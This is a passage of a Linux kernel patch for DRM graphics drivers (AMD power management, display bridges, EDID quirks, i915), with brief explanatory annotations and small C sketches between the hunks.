+ 	unsigned int vlevel = context->bw_ctx.dml.vba.VoltageLevel;
+ 	unsigned int dcfclk = context->bw_ctx.dml.vba.DCFCLKState[vlevel][context->bw_ctx.dml.vba.maxMpcComb];
+ 	unsigned int socclk = context->bw_ctx.dml.vba.SOCCLKPerState[vlevel];
++	struct vba_vars_st *vba = &context->bw_ctx.dml.vba;
+ 
+ 	dc_assert_fp_enabled();
+ 
+@@ -569,6 +571,11 @@ void dcn32_set_phantom_stream_timing(struct dc *dc,
+ 	phantom_vactive = get_subviewport_lines_needed_in_mall(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx) +
+ 				pstate_width_fw_delay_lines + dc->caps.subvp_swath_height_margin_lines;
+ 
++	// W/A for DCC corruption with certain high-resolution timings.
++	// Determine if pipe split is used. If so, add meta_row_height to the phantom vactive.
++	num_dpp = vba->NoOfDPP[vba->VoltageLevel][vba->maxMpcComb][vba->pipe_plane[pipe_idx]];
++	phantom_vactive += num_dpp > 1 ? vba->meta_row_height[vba->pipe_plane[pipe_idx]] : 0;
++
+ 	// For backporch of phantom pipe, use vstartup of the main pipe
+ 	phantom_bp = get_vstartup(&context->bw_ctx.dml, pipes, pipe_cnt, pipe_idx);
+ 
+diff --git a/drivers/gpu/drm/amd/include/kgd_pp_interface.h b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+index a40ead44778af..d18162e9ed1da 100644
+--- a/drivers/gpu/drm/amd/include/kgd_pp_interface.h
++++ b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+@@ -354,7 +354,8 @@ struct amd_pm_funcs {
+ 	int (*get_power_profile_mode)(void *handle, char *buf);
+ 	int (*set_power_profile_mode)(void *handle, long *input, uint32_t size);
+ 	int (*set_fine_grain_clk_vol)(void *handle, uint32_t type, long *input, uint32_t size);
+-	int (*odn_edit_dpm_table)(void *handle, uint32_t type, long *input, uint32_t size);
++	int (*odn_edit_dpm_table)(void *handle, enum PP_OD_DPM_TABLE_COMMAND type,
++				  long *input, uint32_t size);
+ 	int (*set_mp1_state)(void *handle, enum pp_mp1_state mp1_state);
+ 	int (*smu_i2c_bus_access)(void *handle, bool acquire);
+ 	int (*gfx_state_change_set)(void *handle, uint32_t state);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index ec055858eb95a..1159ae114dd02 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -838,7 +838,8 @@ static int pp_set_fine_grain_clk_vol(void *handle, uint32_t type, long *input, u
+ 	return hwmgr->hwmgr_func->set_fine_grain_clk_vol(hwmgr, type, input, size);
+ }
+ 
+-static int pp_odn_edit_dpm_table(void *handle, uint32_t type, long *input, uint32_t size)
++static int pp_odn_edit_dpm_table(void *handle, enum PP_OD_DPM_TABLE_COMMAND type,
++				 long *input, uint32_t size)
+ {
+ 	struct pp_hwmgr *hwmgr = handle;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+index 67d7da0b6fed5..1d829402cd2e2 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+@@ -75,8 +75,10 @@ int psm_init_power_state_table(struct pp_hwmgr *hwmgr)
+ 	for (i = 0; i < table_entries; i++) {
+ 		result = hwmgr->hwmgr_func->get_pp_table_entry(hwmgr, i, state);
+ 		if (result) {
++			kfree(hwmgr->current_ps);
+ 			kfree(hwmgr->request_ps);
+ 			kfree(hwmgr->ps);
++			hwmgr->current_ps = NULL;
+ 			hwmgr->request_ps = NULL;
+ 			hwmgr->ps = NULL;
+ 			return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+index 190af79f3236f..dad3e3741a4e8 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+@@ -67,21 +67,22 @@ int vega10_fan_ctrl_get_fan_speed_info(struct pp_hwmgr *hwmgr,
+ int vega10_fan_ctrl_get_fan_speed_pwm(struct pp_hwmgr *hwmgr,
+ 		uint32_t *speed)
+ {
+-	struct amdgpu_device *adev = hwmgr->adev;
+-	uint32_t duty100, duty;
+-	uint64_t tmp64;
++	uint32_t current_rpm;
++	uint32_t percent = 0;
+ 
+-	duty100 = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_FDO_CTRL1),
+-				CG_FDO_CTRL1, FMAX_DUTY100);
+-	duty = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_THERMAL_STATUS),
+-				CG_THERMAL_STATUS, FDO_PWM_DUTY);
++	if (hwmgr->thermal_controller.fanInfo.bNoFan)
++		return 0;
+ 
+-	if (!duty100)
+-		return -EINVAL;
++	if (vega10_get_current_rpm(hwmgr, &current_rpm))
++		return -1;
++
++	if (hwmgr->thermal_controller.
++			advanceFanControlParameters.usMaxFanRPM != 0)
++		percent = current_rpm * 255 /
++			hwmgr->thermal_controller.
++			advanceFanControlParameters.usMaxFanRPM;
+ 
+-	tmp64 = (uint64_t)duty * 255;
+-	do_div(tmp64, duty100);
+-	*speed = MIN((uint32_t)tmp64, 255);
++	*speed = MIN(percent, 255);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+index 97b3ad3690467..b30684c84e20e 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+@@ -2961,7 +2961,8 @@ static int vega20_odn_edit_dpm_table(struct pp_hwmgr *hwmgr,
+ 			data->od8_settings.od8_settings_array;
+ 	OverDriveTable_t *od_table =
+ 			&(data->smc_state_table.overdrive_table);
+-	int32_t input_index, input_clk, input_vol, i;
++	int32_t input_clk, input_vol, i;
++	uint32_t input_index;
+ 	int od8_id;
+ 	int ret;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+index 70b560737687e..ad5f6a15a1d7d 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/smu_v11_0.c
+@@ -1588,6 +1588,10 @@ bool smu_v11_0_baco_is_support(struct smu_context *smu)
+ 	if (amdgpu_sriov_vf(smu->adev) || !smu_baco->platform_support)
+ 		return false;
+ 
++	/* return true if ASIC is in BACO state already */
++	if (smu_v11_0_baco_get_state(smu) == SMU_BACO_STATE_ENTER)
++		return true;
++
+ 	/* Arcturus does not support this bit mask */
+ 	if (smu_cmn_feature_is_supported(smu, SMU_FEATURE_BACO_BIT) &&
+ 	   !smu_cmn_feature_is_enabled(smu, SMU_FEATURE_BACO_BIT))
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index d74debc584f89..39deb06a86ba3 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -1436,7 +1436,7 @@ static int smu_v13_0_7_get_power_limit(struct smu_context *smu,
+ 
+ static int smu_v13_0_7_get_power_profile_mode(struct smu_context *smu, char *buf)
+ {
+-	DpmActivityMonitorCoeffIntExternal_t activity_monitor_external[PP_SMC_POWER_PROFILE_COUNT];
++	DpmActivityMonitorCoeffIntExternal_t *activity_monitor_external;
+ 	uint32_t i, j, size = 0;
+ 	int16_t workload_type = 0;
+ 	int result = 0;
+@@ -1444,6 +1444,12 @@ static int smu_v13_0_7_get_power_profile_mode(struct smu_context *smu, char *buf
+ 	if (!buf)
+ 		return -EINVAL;
+ 
++	activity_monitor_external = kcalloc(PP_SMC_POWER_PROFILE_COUNT,
++					    sizeof(*activity_monitor_external),
++					    GFP_KERNEL);
++	if (!activity_monitor_external)
++		return -ENOMEM;
++
+ 	size += sysfs_emit_at(buf, size, "                              ");
+ 	for (i = 0; i <= PP_SMC_POWER_PROFILE_WINDOW3D; i++)
+ 		size += sysfs_emit_at(buf, size, "%-14s%s", amdgpu_pp_profile_name[i],
+@@ -1456,15 +1462,17 @@ static int smu_v13_0_7_get_power_profile_mode(struct smu_context *smu, char *buf
+ 		workload_type = smu_cmn_to_asic_specific_index(smu,
+ 							       CMN2ASIC_MAPPING_WORKLOAD,
+ 							       i);
+-		if (workload_type < 0)
+-			return -EINVAL;
++		if (workload_type < 0) {
++			result = -EINVAL;
++			goto out;
++		}
+ 
+ 		result = smu_cmn_update_table(smu,
+ 					  SMU_TABLE_ACTIVITY_MONITOR_COEFF, workload_type,
+ 					  (void *)(&activity_monitor_external[i]), false);
+ 		if (result) {
+ 			dev_err(smu->adev->dev, "[%s] Failed to get activity monitor!", __func__);
+-			return result;
++			goto out;
+ 		}
+ 	}
+ 
+@@ -1492,7 +1500,10 @@ do {													\
+ 	PRINT_DPM_MONITOR(Fclk_BoosterFreq);
+ #undef PRINT_DPM_MONITOR
+ 
+-	return size;
++	result = size;
++out:
++	kfree(activity_monitor_external);
++	return result;
+ }
+ 
+ static int smu_v13_0_7_set_power_profile_mode(struct smu_context *smu, long *input, uint32_t size)
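The smu_v13_0_7_ppt.c hunk above is a textbook kernel-stack fix: PP_SMC_POWER_PROFILE_COUNT copies of DpmActivityMonitorCoeffIntExternal_t are far too large to live on the kernel stack, so the array moves to kcalloc() and every error return is rewritten as a goto to a single freeing exit. The shape of that transformation, reduced to a sketch with hypothetical step_one()/step_two() helpers:

#include <linux/slab.h>

struct big_entry { char payload[1024]; };	/* stand-in for the SMU table */

static int step_one(struct big_entry *t) { return 0; }		/* hypothetical */
static int step_two(struct big_entry *t, char *buf) { return 0; }	/* hypothetical */

static int fill_report(char *buf, size_t nentries)
{
	struct big_entry *tbl;
	int ret;

	/* Was: struct big_entry tbl[nentries]; -- a KiB of stack per entry. */
	tbl = kcalloc(nentries, sizeof(*tbl), GFP_KERNEL);
	if (!tbl)
		return -ENOMEM;

	ret = step_one(tbl);
	if (ret)
		goto out;		/* no early return may skip the kfree() */
	ret = step_two(tbl, buf);
out:
	kfree(tbl);
	return ret;
}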
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7511.h b/drivers/gpu/drm/bridge/adv7511/adv7511.h
+index 94de73cbeb2dd..17445800248dd 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7511.h
++++ b/drivers/gpu/drm/bridge/adv7511/adv7511.h
+@@ -402,7 +402,8 @@ static inline int adv7511_cec_init(struct device *dev, struct adv7511 *adv7511)
+ 
+ void adv7533_dsi_power_on(struct adv7511 *adv);
+ void adv7533_dsi_power_off(struct adv7511 *adv);
+-void adv7533_mode_set(struct adv7511 *adv, const struct drm_display_mode *mode);
++enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
++					const struct drm_display_mode *mode);
+ int adv7533_patch_registers(struct adv7511 *adv);
+ int adv7533_patch_cec_registers(struct adv7511 *adv);
+ int adv7533_attach_dsi(struct adv7511 *adv);
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+index f887200e8abc9..78b72739e5c3e 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+@@ -697,7 +697,7 @@ adv7511_detect(struct adv7511 *adv7511, struct drm_connector *connector)
+ }
+ 
+ static enum drm_mode_status adv7511_mode_valid(struct adv7511 *adv7511,
+-			      struct drm_display_mode *mode)
++			      const struct drm_display_mode *mode)
+ {
+ 	if (mode->clock > 165000)
+ 		return MODE_CLOCK_HIGH;
+@@ -791,9 +791,6 @@ static void adv7511_mode_set(struct adv7511 *adv7511,
+ 	regmap_update_bits(adv7511->regmap, 0x17,
+ 		0x60, (vsync_polarity << 6) | (hsync_polarity << 5));
+ 
+-	if (adv7511->type == ADV7533 || adv7511->type == ADV7535)
+-		adv7533_mode_set(adv7511, adj_mode);
+-
+ 	drm_mode_copy(&adv7511->curr_mode, adj_mode);
+ 
+ 	/*
+@@ -913,6 +910,18 @@ static void adv7511_bridge_mode_set(struct drm_bridge *bridge,
+ 	adv7511_mode_set(adv, mode, adj_mode);
+ }
+ 
++static enum drm_mode_status adv7511_bridge_mode_valid(struct drm_bridge *bridge,
++						      const struct drm_display_info *info,
++		const struct drm_display_mode *mode)
++{
++	struct adv7511 *adv = bridge_to_adv7511(bridge);
++
++	if (adv->type == ADV7533 || adv->type == ADV7535)
++		return adv7533_mode_valid(adv, mode);
++	else
++		return adv7511_mode_valid(adv, mode);
++}
++
+ static int adv7511_bridge_attach(struct drm_bridge *bridge,
+ 				 enum drm_bridge_attach_flags flags)
+ {
+@@ -960,6 +969,7 @@ static const struct drm_bridge_funcs adv7511_bridge_funcs = {
+ 	.enable = adv7511_bridge_enable,
+ 	.disable = adv7511_bridge_disable,
+ 	.mode_set = adv7511_bridge_mode_set,
++	.mode_valid = adv7511_bridge_mode_valid,
+ 	.attach = adv7511_bridge_attach,
+ 	.detect = adv7511_bridge_detect,
+ 	.get_edid = adv7511_bridge_get_edid,
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7533.c b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+index ef6270806d1d3..258c79d4dab0a 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7533.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+@@ -100,26 +100,27 @@ void adv7533_dsi_power_off(struct adv7511 *adv)
+ 	regmap_write(adv->regmap_cec, 0x27, 0x0b);
+ }
+ 
+-void adv7533_mode_set(struct adv7511 *adv, const struct drm_display_mode *mode)
++enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
++					const struct drm_display_mode *mode)
+ {
++	int lanes;
+ 	struct mipi_dsi_device *dsi = adv->dsi;
+-	int lanes, ret;
+-
+-	if (adv->num_dsi_lanes != 4)
+-		return;
+ 
+ 	if (mode->clock > 80000)
+ 		lanes = 4;
+ 	else
+ 		lanes = 3;
+ 
+-	if (lanes != dsi->lanes) {
+-		mipi_dsi_detach(dsi);
+-		dsi->lanes = lanes;
+-		ret = mipi_dsi_attach(dsi);
+-		if (ret)
+-			dev_err(&dsi->dev, "failed to change host lanes\n");
+-	}
++	/*
++	 * TODO: add support for dynamic switching of lanes
++	 * by using the bridge pre_enable() op. Until then, filter
++	 * out the modes which would need a different number of lanes
++	 * than what was configured in the device tree.
++	 */
++	if (lanes != dsi->lanes)
++		return MODE_BAD;
++
++	return MODE_OK;
+ }
+ 
+ int adv7533_patch_registers(struct adv7511 *adv)
+diff --git a/drivers/gpu/drm/bridge/ite-it6505.c b/drivers/gpu/drm/bridge/ite-it6505.c
+index dfe4351c9bdd3..99123eec45511 100644
+--- a/drivers/gpu/drm/bridge/ite-it6505.c
++++ b/drivers/gpu/drm/bridge/ite-it6505.c
+@@ -2860,10 +2860,7 @@ static int it6505_bridge_attach(struct drm_bridge *bridge,
+ 	}
+ 
+ 	/* Register aux channel */
+-	it6505->aux.name = "DP-AUX";
+-	it6505->aux.dev = dev;
+ 	it6505->aux.drm_dev = bridge->dev;
+-	it6505->aux.transfer = it6505_aux_transfer;
+ 
+ 	ret = drm_dp_aux_register(&it6505->aux);
+ 
+@@ -3316,6 +3313,11 @@ static int it6505_i2c_probe(struct i2c_client *client,
+ 	DRM_DEV_DEBUG_DRIVER(dev, "it6505 device name: %s", dev_name(dev));
+ 	debugfs_init(it6505);
+ 
++	it6505->aux.name = "DP-AUX";
++	it6505->aux.dev = dev;
++	it6505->aux.transfer = it6505_aux_transfer;
++	drm_dp_aux_init(&it6505->aux);
++
+ 	it6505->bridge.funcs = &it6505_bridge_funcs;
+ 	it6505->bridge.type = DRM_MODE_CONNECTOR_DisplayPort;
+ 	it6505->bridge.ops = DRM_BRIDGE_OP_DETECT | DRM_BRIDGE_OP_EDID |
+diff --git a/drivers/gpu/drm/drm_atomic_helper.c b/drivers/gpu/drm/drm_atomic_helper.c
+index 98cc3137c0625..02b4a7dc92f5e 100644
+--- a/drivers/gpu/drm/drm_atomic_helper.c
++++ b/drivers/gpu/drm/drm_atomic_helper.c
+@@ -945,7 +945,6 @@ int drm_atomic_helper_check_crtc_state(struct drm_crtc_state *crtc_state,
+ 				       bool can_disable_primary_planes)
+ {
+ 	struct drm_device *dev = crtc_state->crtc->dev;
+-	struct drm_atomic_state *state = crtc_state->state;
+ 
+ 	if (!crtc_state->enable)
+ 		return 0;
+@@ -956,14 +955,7 @@ int drm_atomic_helper_check_crtc_state(struct drm_crtc_state *crtc_state,
+ 		struct drm_plane *plane;
+ 
+ 		drm_for_each_plane_mask(plane, dev, crtc_state->plane_mask) {
+-			struct drm_plane_state *plane_state;
+-
+-			if (plane->type != DRM_PLANE_TYPE_PRIMARY)
+-				continue;
+-			plane_state = drm_atomic_get_plane_state(state, plane);
+-			if (IS_ERR(plane_state))
+-				return PTR_ERR(plane_state);
+-			if (plane_state->fb && plane_state->crtc) {
++			if (plane->type == DRM_PLANE_TYPE_PRIMARY) {
+ 				has_primary_plane = true;
+ 				break;
+ 			}
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 4005dab6147d9..b36abfa915813 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -87,6 +87,8 @@ static int oui(u8 first, u8 second, u8 third)
+ #define EDID_QUIRK_FORCE_10BPC			(1 << 11)
+ /* Non desktop display (i.e. HMD) */
+ #define EDID_QUIRK_NON_DESKTOP			(1 << 12)
++/* Cap the DSC target bitrate to 15bpp */
++#define EDID_QUIRK_CAP_DSC_15BPP		(1 << 13)
+ 
+ #define MICROSOFT_IEEE_OUI	0xca125c
+ 
+@@ -147,6 +149,12 @@ static const struct edid_quirk {
+ 	EDID_QUIRK('F', 'C', 'M', 13600, EDID_QUIRK_PREFER_LARGE_75 |
+ 				       EDID_QUIRK_DETAILED_IN_CM),
+ 
++	/* LG 27GP950 */
++	EDID_QUIRK('G', 'S', 'M', 0x5bbf, EDID_QUIRK_CAP_DSC_15BPP),
++
++	/* LG 27GN950 */
++	EDID_QUIRK('G', 'S', 'M', 0x5b9a, EDID_QUIRK_CAP_DSC_15BPP),
++
+ 	/* LGD panel of HP zBook 17 G2, eDP 10 bpc, but reports unknown bpc */
+ 	EDID_QUIRK('L', 'G', 'D', 764, EDID_QUIRK_FORCE_10BPC),
+ 
+@@ -6166,6 +6174,7 @@ static void drm_reset_display_info(struct drm_connector *connector)
+ 
+ 	info->mso_stream_count = 0;
+ 	info->mso_pixel_overlap = 0;
++	info->max_dsc_bpp = 0;
+ }
+ 
+ static u32 update_display_info(struct drm_connector *connector,
+@@ -6252,6 +6261,9 @@ out:
+ 		info->non_desktop = true;
+ 	}
+ 
++	if (quirks & EDID_QUIRK_CAP_DSC_15BPP)
++		info->max_dsc_bpp = 15;
++
+ 	return quirks;
+ }
+ 
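This drm_edid.c hunk is the receiving half of the amdgpu_dm_helpers.c removal earlier in this patch: the two LG panel IDs (product IDs 0x5bbf and 0x5b9a) move out of a driver-private monitor_patch_table into the generic EDID quirk list, and the cap now surfaces as display_info.max_dsc_bpp. Consumers then need only a clamp; a hedged sketch of one (the helper itself is hypothetical, not a DRM API):

#include <linux/minmax.h>

/*
 * info->max_dsc_bpp == 0 means no quirk applies; the quirked LG
 * panels report 15, capping the DSC target bitrate at 15 bpp.
 */
static unsigned int dsc_bpp_with_quirk(unsigned int computed_bpp,
				       unsigned int max_dsc_bpp)
{
	return max_dsc_bpp ? min(computed_bpp, max_dsc_bpp) : computed_bpp;
}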
+diff --git a/drivers/gpu/drm/drm_fourcc.c b/drivers/gpu/drm/drm_fourcc.c
+index e09331bb3bc73..6242dfbe92402 100644
+--- a/drivers/gpu/drm/drm_fourcc.c
++++ b/drivers/gpu/drm/drm_fourcc.c
+@@ -297,12 +297,12 @@ const struct drm_format_info *__drm_format_info(u32 format)
+ 		  .vsub = 2, .is_yuv = true },
+ 		{ .format = DRM_FORMAT_Q410,		.depth = 0,
+ 		  .num_planes = 3, .char_per_block = { 2, 2, 2 },
+-		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 0,
+-		  .vsub = 0, .is_yuv = true },
++		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 1,
++		  .vsub = 1, .is_yuv = true },
+ 		{ .format = DRM_FORMAT_Q401,		.depth = 0,
+ 		  .num_planes = 3, .char_per_block = { 2, 2, 2 },
+-		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 0,
+-		  .vsub = 0, .is_yuv = true },
++		  .block_w = { 1, 1, 1 }, .block_h = { 1, 1, 1 }, .hsub = 1,
++		  .vsub = 1, .is_yuv = true },
+ 		{ .format = DRM_FORMAT_P030,            .depth = 0,  .num_planes = 2,
+ 		  .char_per_block = { 4, 8, 0 }, .block_w = { 3, 3, 0 }, .block_h = { 1, 1, 0 },
+ 		  .hsub = 2, .vsub = 2, .is_yuv = true},
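The Q410/Q401 correction above matters because hsub/vsub act as divisors: helpers along the lines of drm_format_info_plane_width()/_height() compute each chroma plane's size as the full size divided by the subsampling factors, so the bogus 0 invited a divide-by-zero, and for these non-subsampled 4:4:4 layouts the right divisor is 1. The arithmetic as plain, runnable C:

#include <stdio.h>

static void plane_dims(unsigned int w, unsigned int h,
		       unsigned int hsub, unsigned int vsub)
{
	/* Plane 0 (luma) is full size; planes > 0 are subsampled. */
	printf("luma %ux%u, chroma %ux%u\n", w, h, w / hsub, h / vsub);
}

int main(void)
{
	plane_dims(4096, 2160, 1, 1);	/* Q410/Q401 (4:4:4): chroma untouched */
	plane_dims(4096, 2160, 2, 2);	/* 4:2:0 (e.g. NV12): chroma 2048x1080 */
	/* hsub == 0, the old table value, would fault right here. */
	return 0;
}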
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gpu.c b/drivers/gpu/drm/etnaviv/etnaviv_gpu.c
+index 37018bc55810d..f667e7906d1f4 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gpu.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gpu.c
+@@ -416,6 +416,12 @@ static void etnaviv_hw_identify(struct etnaviv_gpu *gpu)
+ 	if (gpu->identity.model == chipModel_GC700)
+ 		gpu->identity.features &= ~chipFeatures_FAST_CLEAR;
+ 
++	/* These models/revisions don't have the 2D pipe bit */
++	if ((gpu->identity.model == chipModel_GC500 &&
++	     gpu->identity.revision <= 2) ||
++	    gpu->identity.model == chipModel_GC300)
++		gpu->identity.features |= chipFeatures_PIPE_2D;
++
+ 	if ((gpu->identity.model == chipModel_GC500 &&
+ 	     gpu->identity.revision < 2) ||
+ 	    (gpu->identity.model == chipModel_GC300 &&
+@@ -449,8 +455,9 @@ static void etnaviv_hw_identify(struct etnaviv_gpu *gpu)
+ 				gpu_read(gpu, VIVS_HI_CHIP_MINOR_FEATURE_5);
+ 	}
+ 
+-	/* GC600 idle register reports zero bits where modules aren't present */
+-	if (gpu->identity.model == chipModel_GC600)
++	/* GC600/300 idle register reports zero bits where modules aren't present */
++	if (gpu->identity.model == chipModel_GC600 ||
++	    gpu->identity.model == chipModel_GC300)
+ 		gpu->idle_mask = VIVS_HI_IDLE_STATE_TX |
+ 				 VIVS_HI_IDLE_STATE_RA |
+ 				 VIVS_HI_IDLE_STATE_SE |
+diff --git a/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c b/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c
+index 4d4a715b429d1..2c2b92324a2e9 100644
+--- a/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c
++++ b/drivers/gpu/drm/fsl-dcu/fsl_dcu_drm_rgb.c
+@@ -60,8 +60,9 @@ static int fsl_dcu_drm_connector_get_modes(struct drm_connector *connector)
+ 	return drm_panel_get_modes(fsl_connector->panel, connector);
+ }
+ 
+-static int fsl_dcu_drm_connector_mode_valid(struct drm_connector *connector,
+-					    struct drm_display_mode *mode)
++static enum drm_mode_status
++fsl_dcu_drm_connector_mode_valid(struct drm_connector *connector,
++				 struct drm_display_mode *mode)
+ {
+ 	if (mode->hdisplay & 0xf)
+ 		return MODE_ERROR;
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index 28bdb936cd1fc..edbdb949b6ced 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -414,7 +414,7 @@ static void *generate_lfp_data_ptrs(struct drm_i915_private *i915,
+ 		ptrs->lvds_entries++;
+ 
+ 	if (size != 0 || ptrs->lvds_entries != 3) {
+-		kfree(ptrs);
++		kfree(ptrs_block);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 2b5bc95a8b0df..78b3427471bd7 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -3675,61 +3675,6 @@ static void intel_dp_phy_pattern_update(struct intel_dp *intel_dp,
+ 	}
+ }
+ 
+-static void
+-intel_dp_autotest_phy_ddi_disable(struct intel_dp *intel_dp,
+-				  const struct intel_crtc_state *crtc_state)
+-{
+-	struct intel_digital_port *dig_port = dp_to_dig_port(intel_dp);
+-	struct drm_device *dev = dig_port->base.base.dev;
+-	struct drm_i915_private *dev_priv = to_i915(dev);
+-	struct intel_crtc *crtc = to_intel_crtc(dig_port->base.base.crtc);
+-	enum pipe pipe = crtc->pipe;
+-	u32 trans_ddi_func_ctl_value, trans_conf_value, dp_tp_ctl_value;
+-
+-	trans_ddi_func_ctl_value = intel_de_read(dev_priv,
+-						 TRANS_DDI_FUNC_CTL(pipe));
+-	trans_conf_value = intel_de_read(dev_priv, PIPECONF(pipe));
+-	dp_tp_ctl_value = intel_de_read(dev_priv, TGL_DP_TP_CTL(pipe));
+-
+-	trans_ddi_func_ctl_value &= ~(TRANS_DDI_FUNC_ENABLE |
+-				      TGL_TRANS_DDI_PORT_MASK);
+-	trans_conf_value &= ~PIPECONF_ENABLE;
+-	dp_tp_ctl_value &= ~DP_TP_CTL_ENABLE;
+-
+-	intel_de_write(dev_priv, PIPECONF(pipe), trans_conf_value);
+-	intel_de_write(dev_priv, TRANS_DDI_FUNC_CTL(pipe),
+-		       trans_ddi_func_ctl_value);
+-	intel_de_write(dev_priv, TGL_DP_TP_CTL(pipe), dp_tp_ctl_value);
+-}
+-
+-static void
+-intel_dp_autotest_phy_ddi_enable(struct intel_dp *intel_dp,
+-				 const struct intel_crtc_state *crtc_state)
+-{
+-	struct intel_digital_port *dig_port = dp_to_dig_port(intel_dp);
+-	struct drm_device *dev = dig_port->base.base.dev;
+-	struct drm_i915_private *dev_priv = to_i915(dev);
+-	enum port port = dig_port->base.port;
+-	struct intel_crtc *crtc = to_intel_crtc(dig_port->base.base.crtc);
+-	enum pipe pipe = crtc->pipe;
+-	u32 trans_ddi_func_ctl_value, trans_conf_value, dp_tp_ctl_value;
+-
+-	trans_ddi_func_ctl_value = intel_de_read(dev_priv,
+-						 TRANS_DDI_FUNC_CTL(pipe));
+-	trans_conf_value = intel_de_read(dev_priv, PIPECONF(pipe));
+-	dp_tp_ctl_value = intel_de_read(dev_priv, TGL_DP_TP_CTL(pipe));
+-
+-	trans_ddi_func_ctl_value |= TRANS_DDI_FUNC_ENABLE |
+-				    TGL_TRANS_DDI_SELECT_PORT(port);
+-	trans_conf_value |= PIPECONF_ENABLE;
+-	dp_tp_ctl_value |= DP_TP_CTL_ENABLE;
+-
+-	intel_de_write(dev_priv, PIPECONF(pipe), trans_conf_value);
+-	intel_de_write(dev_priv, TGL_DP_TP_CTL(pipe), dp_tp_ctl_value);
+-	intel_de_write(dev_priv, TRANS_DDI_FUNC_CTL(pipe),
+-		       trans_ddi_func_ctl_value);
+-}
+-
+ static void intel_dp_process_phy_request(struct intel_dp *intel_dp,
+ 					 const struct intel_crtc_state *crtc_state)
+ {
+@@ -3748,14 +3693,10 @@ static void intel_dp_process_phy_request(struct intel_dp *intel_dp,
+ 	intel_dp_get_adjust_train(intel_dp, crtc_state, DP_PHY_DPRX,
+ 				  link_status);
+ 
+-	intel_dp_autotest_phy_ddi_disable(intel_dp, crtc_state);
+-
+ 	intel_dp_set_signal_levels(intel_dp, crtc_state, DP_PHY_DPRX);
+ 
+ 	intel_dp_phy_pattern_update(intel_dp, crtc_state);
+ 
+-	intel_dp_autotest_phy_ddi_enable(intel_dp, crtc_state);
+-
+ 	drm_dp_dpcd_write(&intel_dp->aux, DP_TRAINING_LANE0_SET,
+ 			  intel_dp->train_set, crtc_state->lane_count);
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index 73d9eda1d6b7a..e63329bc80659 100644
